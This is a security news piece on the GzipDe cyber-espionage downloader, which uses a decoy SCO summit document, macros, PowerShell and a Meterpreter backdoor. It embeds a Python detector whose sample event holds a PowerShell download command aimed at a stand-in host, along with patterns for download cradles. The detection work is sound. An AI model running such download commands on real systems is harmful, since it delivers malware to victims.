A new piece of what appears to be highly targeted malware has been discovered by researchers at AlienVault. The new strain, dubbed GzipDe and most likely used in cyber-espionage campaigns, uses an article about the next Shanghai Cooperation Organization Summit as its decoy.
More about the GzipDe Malware Operation
About a week ago, researchers detected a new malicious document targeting this region. Apparently, the document includes a piece of text taken from the report as a decoy.
AlienVault discovered a booby-trapped Word document on VirusTotal which was published by a user from Afghanistan. This is how they unearthed the malware.
The above-mentioned booby-trapped document (.doc file) is the first step of a multistage infection in which several servers and artifacts are deployed. The final stage of the malicious operation appears to be the installation of a Metasploit backdoor. However, this is not as interesting as the .NET downloader, which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
The malicious document tricked users into enabling macros, which, once enabled, executed a Visual Basic script. The script then ran some PowerShell code, which in turn downloaded a PE32 executable. The process ended with the actual malware, GZipDe, the researchers reported.
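The infection chain above (Office macro spawning PowerShell, which fetches an executable) is one a defender can look for in process-creation telemetry. The following detection sketch is an added example, not AlienVault's code; the event fields are Sysmon-style names, the sample events are constructed, and the download-cradle patterns are hypothetical and not exhaustive.

```python
"""Flag the Office-macro -> PowerShell -> download chain in process-creation events."""
import re

# Office hosts that should rarely spawn a script interpreter directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Hypothetical command-line fragments typical of a download cradle or hidden/encoded run.
DOWNLOAD_PATTERNS = [
    re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
    re.compile(r"-enc(odedcommand)?\s", re.I),
]

def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the list of reasons an event is suspicious (empty list if none)."""
    reasons = []
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office-host {parent} spawned {image}")
    if image in SCRIPT_HOSTS and any(p.search(cmd) for p in DOWNLOAD_PATTERNS):
        reasons.append("download cradle / encoded command in command line")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that triggers at least one reason."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

# Constructed sample events (Sysmon Event ID 1 style fields), not real logs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, reasons)
```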
GZipDe appears to be coded in .NET, and it is designed to use “a custom encryption method to obfuscate process memory and evade antivirus detection.” Since the initial purpose of GzipDe is to act as a downloader, the malware fetches a more dangerous piece from a remote server. During the researchers’ investigation, however, the remote server was offline, which usually would end the analysis. It turned out that Shodan, the IoT search engine, had indexed the server and even recorded it serving a Metasploit payload.
The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.
In addition, the shellcode loads the entire DLL into memory, enabling it to operate without writing anything to disk. This technique is known as Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network, the researchers concluded.